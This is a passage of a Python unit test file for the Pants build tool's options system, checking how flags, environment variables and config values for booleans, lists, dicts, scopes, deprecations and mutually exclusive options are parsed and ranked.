self.assertTrue(global_options.store_true_def_true_flag)
self.assertFalse(global_options.store_false_def_false_flag)
self.assertFalse(global_options.store_false_def_true_flag)
self.assertTrue(global_options.def_unset_bool_flag)
def test_boolean_negate_option(self) -> None:
global_options = self._parse(
flags="--no-store-true-flag --no-store-false-flag --no-store-true-def-true-flag "
"--no-store-true-def-false-flag --no-store-false-def-true-flag "
"--no-store-false-def-false-flag --no-def-unset-bool-flag"
).for_global_scope()
self.assertFalse(global_options.store_true_flag)
self.assertTrue(global_options.store_false_flag)
self.assertFalse(global_options.store_true_def_false_flag)
self.assertFalse(global_options.store_true_def_true_flag)
self.assertTrue(global_options.store_false_def_false_flag)
self.assertTrue(global_options.store_false_def_true_flag)
self.assertFalse(global_options.def_unset_bool_flag)
def test_boolean_config_override(self) -> None:
def assert_options_set(value: bool) -> None:
global_options = self._parse(
config={
"DEFAULT": {
"store_true_flag": value,
"store_false_flag": value,
"store_true_def_true_flag": value,
"store_true_def_false_flag": value,
"store_false_def_true_flag": value,
"store_false_def_false_flag": value,
"def_unset_bool_flag": value,
},
},
).for_global_scope()
assert global_options.store_true_flag == value
assert global_options.store_false_flag == value
assert global_options.store_true_def_false_flag == value
assert global_options.store_true_def_true_flag == value
assert global_options.store_false_def_false_flag == value
assert global_options.store_false_def_true_flag == value
assert global_options.def_unset_bool_flag == value
assert_options_set(False)
assert_options_set(True)
def test_boolean_invalid_value(self) -> None:
def assert_invalid_value(val) -> None:
with self.assertRaises(BooleanConversionError):
self._parse(config={"DEFAULT": {"store_true_flag": val}}).for_global_scope()
assert_invalid_value(11)
assert_invalid_value("AlmostTrue")
def test_list_option(self) -> None:
def check(
*,
expected: List[int],
flags: str = "",
env_val: Optional[str] = None,
config_val: Optional[str] = None,
) -> None:
env = {"PANTS_GLOBAL_LISTY": env_val} if env_val else None
config = {"GLOBAL": {"listy": config_val}} if config_val else None
global_options = self._parse(flags=flags, env=env, config=config).for_global_scope()
assert global_options.listy == expected
default = [1, 2, 3]
check(expected=default)
# Appending to the default.
check(flags="--listy=4", expected=[*default, 4])
check(flags="--listy=4 --listy=5", expected=[*default, 4, 5])
check(flags="--listy=+[4,5]", expected=[*default, 4, 5])
# Filtering from the default.
check(flags="--listy=-[2]", expected=[1, 3])
# Replacing the default.
check(flags="--listy=[4,5]", expected=[4, 5])
# Appending across env, config and flags (in the right order).
check(
flags="--listy=+[8,9]",
env_val="+[6,7]",
config_val="+[4,5]",
expected=[*default, 4, 5, 6, 7, 8, 9],
)
# Appending and filtering across env, config and flags (in the right order).
check(
flags="--listy=-[1,5,6]", env_val="+[6,7]", config_val="+[4,5]", expected=[2, 3, 4, 7],
)
check(
flags="--listy=+[8,9]",
env_val="-[4,5]",
config_val="+[4,5],-[3]",
expected=[1, 2, 8, 9],
)
# Overwriting from env, then appending and filtering.
check(
flags="--listy=+[8,9],-[6]", env_val="[6,7]", config_val="+[4,5]", expected=[7, 8, 9],
)
# Overwriting from config, then appending.
check(
flags="--listy=+[8,9]",
env_val="+[6,7]",
config_val="[4,5]",
expected=[4, 5, 6, 7, 8, 9],
)
# Overwriting from flags.
check(
flags="--listy=[8,9]", env_val="+[6,7]", config_val="+[4,5],-[8]", expected=[8, 9],
)
# Filtering all instances of repeated values.
check(
flags="--listy=-[5]",
config_val="[1, 2, 5, 3, 4, 5, 6, 5, 5]",
expected=[1, 2, 3, 4, 6],
)
# Filtering a value even though it was appended again at a higher rank.
check(
flags="--listy=+[4]", env_val="-[4]", config_val="+[4,5]", expected=[*default, 5],
)
# Filtering a value even though it was appended again at the same rank.
check(
env_val="-[4],+[4]", config_val="+[4,5]", expected=[*default, 5],
)
# Overwriting cancels filters.
check(env_val="[4]", config_val="-[4]", expected=[4])
def test_dict_list_option(self) -> None:
def check(
*,
expected: List[Dict[str, int]],
flags: str = "",
env_val: Optional[str] = None,
config_val: Optional[str] = None,
) -> None:
env = {"PANTS_GLOBAL_DICT_LISTY": env_val} if env_val else None
config = {"GLOBAL": {"dict_listy": config_val}} if config_val else None
global_options = self._parse(flags=flags, env=env, config=config).for_global_scope()
assert global_options.dict_listy == expected
default = [{"a": 1, "b": 2}, {"c": 3}]
one_element_appended = [*default, {"d": 4, "e": 5}]
two_elements_appended = [*one_element_appended, {"f": 6}]
replaced = [{"d": 4, "e": 5}, {"f": 6}]
check(expected=default)
check(flags='--dict-listy=\'{"d": 4, "e": 5}\'', expected=one_element_appended)
check(
flags='--dict-listy=\'{"d": 4, "e": 5}\' --dict-listy=\'{"f": 6}\'',
expected=two_elements_appended,
)
check(
flags='--dict-listy=\'+[{"d": 4, "e": 5}, {"f": 6}]\'', expected=two_elements_appended,
)
check(flags='--dict-listy=\'[{"d": 4, "e": 5}, {"f": 6}]\'', expected=replaced)
check(env_val='{"d": 4, "e": 5}', expected=one_element_appended)
check(env_val='+[{"d": 4, "e": 5}, {"f": 6}]', expected=two_elements_appended)
check(env_val='[{"d": 4, "e": 5}, {"f": 6}]', expected=replaced)
check(config_val='{"d": 4, "e": 5}', expected=one_element_appended)
check(config_val='+[{"d": 4, "e": 5}, {"f": 6}]', expected=two_elements_appended)
check(config_val='[{"d": 4, "e": 5}, {"f": 6}]', expected=replaced)
def test_target_list_option(self) -> None:
def check(
*,
expected: List[str],
flags: str = "",
env_val: Optional[str] = None,
config_val: Optional[str] = None,
) -> None:
env = {"PANTS_GLOBAL_TARGET_LISTY": env_val} if env_val else None
config = {"GLOBAL": {"target_listy": config_val}} if config_val else None
global_options = self._parse(flags=flags, env=env, config=config).for_global_scope()
assert global_options.target_listy == expected
default = ["//:a", "//:b"]
specified_args = ["//:c", "//:d"]
all_args = [*default, *specified_args]
check(expected=default)
check(flags="--target-listy=//:c --target-listy=//:d", expected=all_args)
check(flags='--target-listy=\'+["//:c", "//:d"]\'', expected=all_args)
check(flags='--target-listy=\'["//:c", "//:d"]\'', expected=specified_args)
check(env_val="//:c", expected=[*default, "//:c"])
check(env_val='+["//:c", "//:d"]', expected=all_args)
check(env_val='["//:c", "//:d"]', expected=specified_args)
check(config_val="//:c", expected=[*default, "//:c"])
check(config_val='+["//:c", "//:d"]', expected=all_args)
check(config_val='["//:c", "//:d"]', expected=specified_args)
def test_shell_str_list(self) -> None:
def check(
*,
expected: List[str],
flags: str = "",
env_val: Optional[str] = None,
config_val: Optional[str] = None,
) -> None:
env = {"PANTS_GLOBAL_SHELL_STR_LISTY": env_val} if env_val else None
config = {"GLOBAL": {"shell_str_listy": config_val}} if config_val else None
global_options = self._parse(flags=flags, env=env, config=config).for_global_scope()
assert global_options.shell_str_listy == expected
default = ["--default1", "--default2=test"]
specified_args = ["arg1", "arg2=foo", "--arg3"]
all_args = [*default, *specified_args]
check(expected=default)
check(
flags="--shell-str-listy='arg1 arg2=foo' --shell-str-listy='--arg3'", expected=all_args
)
check(flags="""--shell-str-listy='+["arg1 arg2=foo", "--arg3"]'""", expected=all_args)
check(flags="""--shell-str-listy='["arg1 arg2=foo", "--arg3"]'""", expected=specified_args)
check(env_val="arg1 arg2=foo --arg3", expected=all_args)
check(env_val='+["arg1 arg2=foo", "--arg3"]', expected=all_args)
check(env_val='["arg1 arg2=foo", "--arg3"]', expected=specified_args)
check(config_val="arg1 arg2=foo --arg3", expected=all_args)
check(config_val='+["arg1 arg2=foo", "--arg3"]', expected=all_args)
check(config_val='["arg1 arg2=foo", "--arg3"]', expected=specified_args)
def test_dict_option(self) -> None:
def check(
*, expected: Dict[str, str], flags: str = "", config_val: Optional[str] = None,
) -> None:
config = {"GLOBAL": {"dicty": config_val}} if config_val else None
global_options = self._parse(flags=flags, config=config).for_global_scope()
assert global_options.dicty == expected
default = {"a": "b"}
specified_args = {"c": "d"}
all_args = {**default, **specified_args}
check(expected=default)
check(flags='--dicty=\'{"c": "d"}\'', expected=specified_args)
check(flags='--dicty=\'+{"c": "d"}\'', expected=all_args)
check(config_val='{"c": "d"}', expected=specified_args)
check(config_val='+{"c": "d"}', expected=all_args)
check(
config_val='+{"c": "d"}',
flags='--dicty=\'+{"e": "f"}\'',
expected={**all_args, "e": "f"},
)
# Check that highest rank wins if we have multiple values for the same key.
check(config_val='+{"a": "b+", "c": "d"}', expected={"a": "b+", "c": "d"})
check(
config_val='+{"a": "b+", "c": "d"}',
flags='--dicty=\'+{"a": "b++"}\'',
expected={"a": "b++", "c": "d"},
)
def test_defaults(self) -> None:
# Hard-coded defaults.
options = self._parse(flags="compile.java -n33")
self.assertEqual(99, options.for_global_scope().num)
self.assertEqual(99, options.for_scope("compile").num)
self.assertEqual(33, options.for_scope("compile.java").num)
self.assertEqual(99, options.for_scope("test").num)
self.assertEqual(99, options.for_scope("test.junit").num)
options = self._parse(flags="compile -n22 compile.java -n33")
self.assertEqual(99, options.for_global_scope().num)
self.assertEqual(22, options.for_scope("compile").num)
self.assertEqual(33, options.for_scope("compile.java").num)
# Get defaults from config and environment.
config = {"DEFAULT": {"num": "88"}, "compile": {"num": "77"}, "compile.java": {"num": "66"}}
options = self._parse(flags="compile.java -n22", config=config)
self.assertEqual(88, options.for_global_scope().num)
self.assertEqual(77, options.for_scope("compile").num)
self.assertEqual(22, options.for_scope("compile.java").num)
env = {"PANTS_COMPILE_NUM": "55"}
options = self._parse(flags="compile", env=env, config=config)
self.assertEqual(88, options.for_global_scope().num)
self.assertEqual(55, options.for_scope("compile").num)
self.assertEqual(55, options.for_scope("compile.java").num)
options = self._parse(flags="compile.java -n44", env=env, config=config)
self.assertEqual(88, options.for_global_scope().num)
self.assertEqual(55, options.for_scope("compile").num)
self.assertEqual(44, options.for_scope("compile.java").num)
def test_choices(self) -> None:
options = self._parse(flags="--str-choices=foo")
self.assertEqual("foo", options.for_global_scope().str_choices)
options = self._parse(config={"DEFAULT": {"str_choices": "bar"}})
self.assertEqual("bar", options.for_global_scope().str_choices)
with self.assertRaises(ParseError):
options = self._parse(flags="--str-choices=baz")
options.for_global_scope()
with self.assertRaises(ParseError):
options = self._parse(config={"DEFAULT": {"str_choices": "baz"}})
options.for_global_scope()
options = self._parse(flags="--int-choices=42 --int-choices=99")
self.assertEqual([42, 99], options.for_global_scope().int_choices)
def test_parse_name_and_dest(self) -> None:
self.assertEqual(("thing", "thing"), Parser.parse_name_and_dest("--thing"))
self.assertEqual(
("thing", "other_thing"), Parser.parse_name_and_dest("--thing", dest="other_thing")
)
def test_validation(self) -> None:
def assertError(expected_error, *args, **kwargs):
with self.assertRaises(expected_error):
options = Options.create(
args=[],
env={},
config=self._create_config(),
known_scope_infos=[global_scope()],
)
options.register(GLOBAL_SCOPE, *args, **kwargs)
options.for_global_scope()
assertError(NoOptionNames)
assertError(OptionNameDash, "badname")
assertError(OptionNameDoubleDash, "-badname")
assertError(InvalidKwarg, "--foo", badkwarg=42)
assertError(ImplicitValIsNone, "--foo", implicit_value=None)
assertError(BooleanOptionNameWithNo, "--no-foo", type=bool)
assertError(MemberTypeNotAllowed, "--foo", member_type=int)
assertError(MemberTypeNotAllowed, "--foo", type=dict, member_type=int)
assertError(InvalidMemberType, "--foo", type=list, member_type=set)
assertError(InvalidMemberType, "--foo", type=list, member_type=list)
assertError(InvalidMemberType, "--foo", type=list, member_type=list)
def test_implicit_value(self) -> None:
def check(*, flag: str = "", expected: str) -> None:
options = self._parse(flags=flag)
assert options.for_global_scope().implicit_valuey == expected
check(expected="default")
check(flag="--implicit-valuey", expected="implicit")
check(flag="--implicit-valuey=explicit", expected="explicit")
def test_shadowing(self) -> None:
options = Options.create(
env={},
config=self._create_config(),
known_scope_infos=[global_scope(), task("bar"), intermediate("foo"), task("foo.bar")],
args=["./pants"],
)
options.register("", "--opt1")
options.register("foo", "-o", "--opt2")
def assert_raises_shadowing(*, scope: str, args: List[str]) -> None:
with self.assertRaises(Shadowing):
options.register(scope, *args)
assert_raises_shadowing(scope="", args=["--opt2"])
assert_raises_shadowing(scope="bar", args=["--opt1"])
assert_raises_shadowing(scope="foo.bar", args=["--opt1"])
assert_raises_shadowing(scope="foo.bar", args=["--opt2"])
assert_raises_shadowing(scope="foo.bar", args=["--opt1", "--opt3"])
assert_raises_shadowing(scope="foo.bar", args=["--opt3", "--opt2"])
def test_recursion(self) -> None:
# Recursive option.
options = self._parse(flags="-n=5 compile -n=6")
self.assertEqual(5, options.for_global_scope().num)
self.assertEqual(6, options.for_scope("compile").num)
# Non-recursive option.
options = self._parse(flags="--bar-baz=foo")
self.assertEqual("foo", options.for_global_scope().bar_baz)
options = self._parse(flags="compile --bar-baz=foo")
with self.assertRaises(ParseError):
options.for_scope("compile")
def test_no_recursive_subsystem_options(self) -> None:
options = Options.create(
env={},
config=self._create_config(),
known_scope_infos=[global_scope(), subsystem("foo")],
args=["./pants"],
)
# All subsystem options are implicitly recursive (a subscope of subsystem scope represents
# a separate instance of the subsystem, so it needs all the options).
# We disallow explicit specification of recursive (even if set to True), to avoid confusion.
with self.assertRaises(RecursiveSubsystemOption):
options.register("foo", "--bar", recursive=False)
options.for_scope("foo")
with self.assertRaises(RecursiveSubsystemOption):
options.register("foo", "--baz", recursive=True)
options.for_scope("foo")
def test_is_known_scope(self) -> None:
options = self._parse()
for scope_info in self._known_scope_infos:
self.assertTrue(options.is_known_scope(scope_info.scope))
self.assertFalse(options.is_known_scope("nonexistent_scope"))
def test_designdoc_example(self) -> None:
# The example from the design doc.
# Get defaults from config and environment.
config = {
"DEFAULT": {"b": "99"},
"compile": {"a": "88", "c": "77"},
}
env = {"PANTS_COMPILE_C": "66"}
options = self._parse(
flags="--a=1 compile --b=2 compile.java --a=3 --c=4", env=env, config=config,
)
self.assertEqual(1, options.for_global_scope().a)
self.assertEqual(99, options.for_global_scope().b)
with self.assertRaises(AttributeError):
options.for_global_scope().c
self.assertEqual(1, options.for_scope("compile").a)
self.assertEqual(2, options.for_scope("compile").b)
self.assertEqual(66, options.for_scope("compile").c)
self.assertEqual(3, options.for_scope("compile.java").a)
self.assertEqual(2, options.for_scope("compile.java").b)
self.assertEqual(4, options.for_scope("compile.java").c)
def test_file_spec_args(self) -> None:
with temporary_file(binary_mode=False) as tmp:
tmp.write(
dedent(
"""
foo
bar
"""
)
)
tmp.flush()
# Note that we prevent loading a real pants.toml during get_bootstrap_options().
flags = f'--spec-file={tmp.name} --pants-config-files="[]" compile morx:tgt fleem:tgt'
bootstrapper = OptionsBootstrapper.create(args=shlex.split(f"./pants {flags}"))
bootstrap_options = bootstrapper.bootstrap_options.for_global_scope()
options = self._parse(flags=flags, bootstrap_option_values=bootstrap_options)
sorted_specs = sorted(options.specs)
self.assertEqual(["bar", "fleem:tgt", "foo", "morx:tgt"], sorted_specs)
def test_passthru_args_subsystems_and_goals(self):
# Test that passthrough args are applied.
options = self._parse(flags="")
options = Options.create(
env={},
config=self._create_config(),
known_scope_infos=[global_scope(), task("test"), subsystem("passconsumer")],
args=["./pants", "test", "target", "--", "bar", "--baz"],
)
options.register(
"passconsumer", "--passthing", passthrough=True, type=list, member_type=str
)
self.assertEqual(["bar", "--baz"], options.for_scope("passconsumer").passthing)
def test_at_most_one_goal_with_passthru_args(self):
with self.assertRaisesWithMessageContaining(
Options.AmbiguousPassthroughError,
"""Specifying multiple goals (in this case: ['test', 'fmt']) """
"""along with passthrough args (args after `--`) is ambiguous.""",
):
_ = Options.create(
env={},
config={},
known_scope_infos=[global_scope(), task("test"), task("fmt")],
args=["./pants", "test", "fmt", "target", "--", "bar", "--baz"],
)
def test_global_scope_env_vars(self):
def check_pants_foo(expected_val, env):
val = self._parse(env=env).for_global_scope().pants_foo
self.assertEqual(expected_val, val)
check_pants_foo(
"AAA", {"PANTS_GLOBAL_PANTS_FOO": "AAA", "PANTS_PANTS_FOO": "BBB", "PANTS_FOO": "CCC"}
)
check_pants_foo("BBB", {"PANTS_PANTS_FOO": "BBB", "PANTS_FOO": "CCC"})
check_pants_foo("CCC", {"PANTS_FOO": "CCC"})
check_pants_foo(None, {})
# Check that an empty string is distinct from no value being specified.
check_pants_foo("", {"PANTS_PANTS_FOO": "", "PANTS_FOO": "CCC"})
# A global option that doesn't begin with 'pants-': Setting BAR_BAZ should have no effect.
def check_bar_baz(expected_val, env):
val = self._parse(env=env).for_global_scope().bar_baz
self.assertEqual(expected_val, val)
check_bar_baz(
"AAA", {"PANTS_GLOBAL_BAR_BAZ": "AAA", "PANTS_BAR_BAZ": "BBB", "BAR_BAZ": "CCC"}
)
check_bar_baz("BBB", {"PANTS_BAR_BAZ": "BBB", "BAR_BAZ": "CCC"})
check_bar_baz(None, {"BAR_BAZ": "CCC"})
check_bar_baz(None, {})
def test_scoped_env_vars(self) -> None:
def check_scoped_spam(scope, expected_val, env):
val = self._parse(env=env).for_scope(scope).spam
self.assertEqual(expected_val, val)
check_scoped_spam("simple", "value", {"PANTS_SIMPLE_SPAM": "value"})
check_scoped_spam("simple-dashed", "value", {"PANTS_SIMPLE_DASHED_SPAM": "value"})
check_scoped_spam("scoped.a.bit", "value", {"PANTS_SCOPED_A_BIT_SPAM": "value"})
check_scoped_spam("scoped.and-dashed", "value", {"PANTS_SCOPED_AND_DASHED_SPAM": "value"})
def test_drop_flag_values(self) -> None:
options = self._parse(
flags="--bar-baz=fred -n33 --pants-foo=red enum-opt --some-enum=another-value simple -n1",
env={"PANTS_FOO": "BAR"},
config={"simple": {"num": 42}, "enum-opt": {"some-enum": "a-value"}},
)
defaulted_only_options = options.drop_flag_values()
# No option value supplied in any form.
self.assertEqual("fred", options.for_global_scope().bar_baz)
self.assertIsNone(defaulted_only_options.for_global_scope().bar_baz)
# A defaulted option value.
self.assertEqual(33, options.for_global_scope().num)
self.assertEqual(99, defaulted_only_options.for_global_scope().num)
# A config specified option value.
self.assertEqual(1, options.for_scope("simple").num)
self.assertEqual(42, defaulted_only_options.for_scope("simple").num)
# An env var specified option value.
self.assertEqual("red", options.for_global_scope().pants_foo)
self.assertEqual("BAR", defaulted_only_options.for_global_scope().pants_foo)
# Overriding an enum option value.
self.assertEqual(self.SomeEnumOption.another_value, options.for_scope("enum-opt").some_enum)
# Getting the default value for an enum option.
self.assertEqual(
self.SomeEnumOption.a_value,
defaulted_only_options.for_scope("separate-enum-opt-scope").some_enum_with_default,
)
def test_enum_option_type_parse_error(self) -> None:
self.maxDiff = None
with self.assertRaisesWithMessageContaining(
ParseError,
"Error applying type 'SomeEnumOption' to option value 'invalid-value', for option "
"'--some_enum' in scope 'enum-opt'",
):
options = self._parse(flags="enum-opt --some-enum=invalid-value")
options.for_scope("enum-opt").some_enum
def assertOptionWarning(self, w, option_string):
single_warning = assert_single_element(w)
self.assertEqual(single_warning.category, DeprecationWarning)
warning_message = str(single_warning.message)
self.assertIn("will be removed in version", warning_message)
self.assertIn(option_string, warning_message)
def test_deprecated_options(self) -> None:
def assert_deprecation_triggered(
*,
flags: str = "",
option: str,
expected: Union[str, bool],
scope: Optional[str] = None,
env: Optional[Dict[str, str]] = None,
config: Optional[Dict[str, Dict[str, str]]] = None,
) -> None:
with self.warnings_catcher() as w:
options = self._parse(flags=flags, env=env, config=config)
scoped_options = (
options.for_global_scope() if not scope else options.for_scope(scope)
)
assert getattr(scoped_options, option) == expected
self.assertOptionWarning(w, option)
assert_deprecation_triggered(
flags="--global-crufty=crufty1", option="global_crufty", expected="crufty1",
)
assert_deprecation_triggered(
flags="--global-crufty-boolean", option="global_crufty_boolean", expected=True,
)
assert_deprecation_triggered(
flags="--no-global-crufty-boolean", option="global_crufty_boolean", expected=False,
)
assert_deprecation_triggered(
flags="stale --crufty=stale_and_crufty",
scope="stale",
option="crufty",
expected="stale_and_crufty",
)
assert_scoped_boolean_deprecation = partial(
assert_deprecation_triggered, scope="stale", option="crufty_boolean"
)
assert_scoped_boolean_deprecation(flags="stale --crufty-boolean", expected=True)
assert_scoped_boolean_deprecation(flags="stale --no-crufty-boolean", expected=False)
assert_scoped_boolean_deprecation(flags="--stale-crufty-boolean", expected=True)
assert_scoped_boolean_deprecation(flags="--no-stale-crufty-boolean", expected=False)
assert_deprecation_triggered(
env={"PANTS_GLOBAL_CRUFTY": "crufty1"}, option="global_crufty", expected="crufty1",
)
assert_deprecation_triggered(
env={"PANTS_STALE_CRUFTY": "stale_and_crufty"},
scope="stale",
option="crufty",
expected="stale_and_crufty",
)
assert_deprecation_triggered(
config={"GLOBAL": {"global_crufty": "crufty1"}},
option="global_crufty",
expected="crufty1",
)
assert_deprecation_triggered(
config={"stale": {"crufty": "stale_and_crufty"}},
scope="stale",
option="crufty",
expected="stale_and_crufty",
)
# Make sure the warnings don't come out for regular options.
with self.warnings_catcher() as w:
self._parse(flags="stale --pants-foo stale --still-good")
self.assertEqual(0, len(w))
@unittest.mock.patch("pants.base.deprecated.PANTS_SEMVER", Version(_FAKE_CUR_VERSION))
def test_delayed_deprecated_option(self) -> None:
with self.warnings_catcher() as w:
delayed_deprecation_option_value = (
self._parse(flags="--global-delayed-deprecated-option=xxx")
.for_global_scope()
.global_delayed_deprecated_option
)
self.assertEqual(delayed_deprecation_option_value, "xxx")
self.assertEqual(0, len(w))
with self.warnings_catcher() as w:
delayed_passed_option_value = (
self._parse(flags="--global-delayed-but-already-passed-deprecated-option=xxx")
.for_global_scope()
.global_delayed_but_already_passed_deprecated_option
)
self.assertEqual(delayed_passed_option_value, "xxx")
self.assertOptionWarning(w, "global_delayed_but_already_passed_deprecated_option")
def test_mutually_exclusive_options(self) -> None:
"""Ensure error is raised when mutual exclusive options are given together."""
def assert_mutually_exclusive_raised(
*,
flags: str,
scope: Optional[str] = None,
env: Optional[Dict[str, str]] = None,
config: Optional[Dict[str, Dict[str, str]]] = None,
) -> None:
with self.assertRaises(MutuallyExclusiveOptionError):
options = self._parse(flags=flags, env=env, config=config)
if scope:
options.for_scope(scope)
else:
options.for_global_scope()
assert_mutually_exclusive_raised(flags="--mutex-foo=foo --mutex-bar=bar")
assert_mutually_exclusive_raised(flags="--mutex-foo=foo --mutex-baz=baz")
assert_mutually_exclusive_raised(flags="--mutex-bar=bar --mutex-baz=baz")
assert_mutually_exclusive_raised(flags="--mutex-foo=foo --mutex-bar=bar --mutex-baz=baz")
assert_mutually_exclusive_raised(flags="--new-name=foo --old-name=bar")
assert_mutually_exclusive_raised(flags="--new-name=foo --old-name=bar")
assert_mutually_exclusive_raised(flags="stale --mutex-a=foo --mutex-b=bar", scope="stale")
assert_mutually_exclusive_raised(
flags="stale --crufty-new=foo --crufty-old=bar", scope="stale"
)
assert_mutually_exclusive_raised(flags="--mutex-foo=foo", env={"PANTS_MUTEX_BAR": "bar"})
assert_mutually_exclusive_raised(flags="--new-name=foo", env={"PANTS_OLD_NAME": "bar"})
assert_mutually_exclusive_raised(
flags="stale --mutex-a=foo", env={"PANTS_STALE_MUTEX_B": "bar"}, scope="stale",
)
assert_mutually_exclusive_raised(
flags="stale --crufty-new=foo", env={"PANTS_STALE_CRUFTY_OLD": "bar"}, scope="stale",
)
assert_mutually_exclusive_raised(
flags="--mutex-foo=foo", config={"GLOBAL": {"mutex_bar": "bar"}},
)
assert_mutually_exclusive_raised(
flags="--new-name=foo", config={"GLOBAL": {"old_name": "bar"}},
)
assert_mutually_exclusive_raised(
flags="stale --mutex-a=foo", config={"stale": {"mutex_b": "bar"}}, scope="stale",
)
assert_mutually_exclusive_raised(
flags="stale --crufty-old=foo", config={"stale": {"crufty_new": "bar"}}, scope="stale",
)
def assert_other_option_also_set(
*,
flags: str = "",
other_option: str,
scope: Optional[str] = None,
env: Optional[Dict[str, str]] = None,
config: Optional[Dict[str, Dict[str, str]]] = None,
) -> None:
options = self._parse(flags=flags, env=env, config=config)
scoped_options = options.for_global_scope() if not scope else options.for_scope(scope)
assert getattr(scoped_options, other_option) == "orz"
assert_other_option_also_set(flags="--mutex-foo=orz", other_option="mutex")
assert_other_option_also_set(flags="--old-name=orz", other_option="new_name")
assert_other_option_also_set(
flags="stale --mutex-a=orz", other_option="crufty_mutex", scope="stale",
)
assert_other_option_also_set(
flags="stale --crufty-old=orz", other_option="crufty_new", scope="stale",
)
assert_other_option_also_set(env={"PANTS_GLOBAL_MUTEX_BAZ": "orz"}, other_option="mutex")
assert_other_option_also_set(env={"PANTS_OLD_NAME": "orz"}, other_option="new_name")
assert_other_option_also_set(
env={"PANTS_STALE_MUTEX_B": "orz"}, other_option="crufty_mutex", scope="stale",
)
assert_other_option_also_set(
config={"stale": {"crufty_old": "orz"}}, other_option="crufty_new", scope="stale",
)
def test_middle_scoped_options(self) -> None:
"""Make sure the rules for inheriting from a hierarchy of scopes.
Values should follow
1. A short circuit scan for a value from the following sources in-order:
flags, env, config, hardcoded defaults
2. Values for each source follow the . hierarchy scoping rule
within that source.
"""
# Short circuit using command line.
options = self._parse(flags="--a=100 compile --a=99")
self.assertEqual(100, options.for_global_scope().a)
self.assertEqual(99, options.for_scope("compile").a)
self.assertEqual(99, options.for_scope("compile.java").a)
options = self._parse(config={"DEFAULT": {"a": 100}, "compile": {"a": 99}})
self.assertEqual(100, options.for_global_scope().a)
self.assertEqual(99, options.for_scope("compile").a)
self.assertEqual(99, options.for_scope("compile.java").a)
options = self._parse(env={"PANTS_A": "100", "PANTS_COMPILE_A": "99"})
self.assertEqual(100, options.for_global_scope().a)
self.assertEqual(99, options.for_scope("compile").a)
self.assertEqual(99, options.for_scope("compile.java").a)
# Command line has precedence over config.
options = self._parse(flags="compile --a=99", config={"DEFAULT": {"a": 100}})
self.assertEqual(100, options.for_global_scope().a)
self.assertEqual(99, options.for_scope("compile").a)
self.assertEqual(99, options.for_scope("compile.java").a)
# Command line has precedence over environment.
options = self._parse(flags="compile --a=99", env={"PANTS_A": "100"})
self.assertEqual(100, options.for_global_scope().a)
self.assertEqual(99, options.for_scope("compile").a)
self.assertEqual(99, options.for_scope("compile.java").a)
# Env has precedence over config.
options = self._parse(config={"DEFAULT": {"a": 100}}, env={"PANTS_COMPILE_A": "99"})
self.assertEqual(100, options.for_global_scope().a)
self.assertEqual(99, options.for_scope("compile").a)
self.assertEqual(99, options.for_scope("compile.java").a)
# Command line global overrides the middle scope setting in then env.
options = self._parse(flags="--a=100", env={"PANTS_COMPILE_A": "99"})
self.assertEqual(100, options.for_global_scope().a)
self.assertEqual(100, options.for_scope("compile").a)
self.assertEqual(100, options.for_scope("compile.java").a)
# Command line global overrides the middle scope in config.
options = self._parse(flags="--a=100 ", config={"compile": {"a": 99}})
self.assertEqual(100, options.for_global_scope().a)
self.assertEqual(100, options.for_scope("compile").a)
self.assertEqual(100, options.for_scope("compile.java").a)
# Env global overrides the middle scope in config.
options = self._parse(
flags="--a=100 ", config={"compile": {"a": 99}}, env={"PANTS_A": "100"}
)
self.assertEqual(100, options.for_global_scope().a)
self.assertEqual(100, options.for_scope("compile").a)
self.assertEqual(100, options.for_scope("compile.java").a)
def test_complete_scopes(self) -> None:
self.assertEqual(
{intermediate("foo"), intermediate("foo.bar"), task("foo.bar.baz")},
set(Options.complete_scopes({task("foo.bar.baz")})),
)
self.assertEqual(
{global_scope(), intermediate("foo"), intermediate("foo.bar"), task("foo.bar.baz")},
set(Options.complete_scopes({GlobalOptions.get_scope_info(), task("foo.bar.baz")})),
)
self.assertEqual(
{intermediate("foo"), intermediate("foo.bar"), task("foo.bar.baz")},
set(Options.complete_scopes({intermediate("foo"), task("foo.bar.baz")})),
)
self.assertEqual(
{
intermediate("foo"),
intermediate("foo.bar"),
task("foo.bar.baz"),
intermediate("qux"),
task("qux.quux"),
},
set(Options.complete_scopes({task("foo.bar.baz"), task("qux.quux")})),
)
def test_get_fingerprintable_for_scope(self) -> None:
# Note: tests handling recursive and non-recursive options from enclosing scopes correctly.
options = self._parse(
flags='--store-true-flag --num=88 compile.scala --num=77 --modifycompile="blah blah blah" '
'--modifylogs="durrrr" -- -d -v'
)
# NB: Passthrough args end up on our `--modifypassthrough` arg.
pairs = options.get_fingerprintable_for_scope("compile.scala")
self.assertEqual(
[(str, "blah blah blah"), (str, ["-d", "-v"]), (bool, True), (int, 77)], pairs
)
def test_fingerprintable(self) -> None:
options = self._parse(
flags="fingerprinting --fingerprinted=shall_be_fingerprinted "
"--definitely-not-fingerprinted=shant_be_fingerprinted"
)
pairs = options.get_fingerprintable_for_scope("fingerprinting")
self.assertIn((str, "shall_be_fingerprinted"), pairs)
self.assertNotIn((str, "shant_be_fingerprinted"), pairs)
def test_fingerprintable_inverted(self) -> None:
options = self._parse(
flags="fingerprinting --inverted=shall_be_fingerprinted "
"--definitely-not-inverted=shant_be_fingerprinted"
)
pairs = options.get_fingerprintable_for_scope(
"fingerprinting", fingerprint_key="daemon", invert=True
)
self.assertIn((str, "shall_be_fingerprinted"), pairs)
self.assertNotIn((str, "shant_be_fingerprinted"), pairs)
def assert_fromfile(self, parse_func, expected_append=None, append_contents=None):
def _do_assert_fromfile(dest, expected, contents):
with temporary_file(binary_mode=False) as fp:
fp.write(contents)
fp.close()
options = parse_func(dest, fp.name)
self.assertEqual(expected, options.for_scope("fromfile")[dest])
_do_assert_fromfile(dest="string", expected="jake", contents="jake")
_do_assert_fromfile(dest="intvalue", expected=42, contents="42")
_do_assert_fromfile(
dest="dictvalue",
expected={"a": 42, "b": (1, 2)},
contents=dedent(
"""
{
'a': 42,
'b': (
1,
2
)
}
"""
),
)
_do_assert_fromfile(
dest="listvalue",
expected=["a", "1", "2"],
contents=dedent(
"""
['a',
1,
2]
"""
),
)
expected_append = expected_append or [1, 2, 42]
append_contents = append_contents or dedent(
"""
[
1,
2,
42
]
"""
)
_do_assert_fromfile(dest="appendvalue", expected=expected_append, contents=append_contents)
def test_fromfile_flags(self) -> None:
def parse_func(dest, fromfile):
return self._parse(flags=f"fromfile --{dest.replace("_", "-")}=@{fromfile}")
# You can only append a single item at a time with append flags, ie: we don't override the
# default list like we do with env of config. As such, send in a single append value here
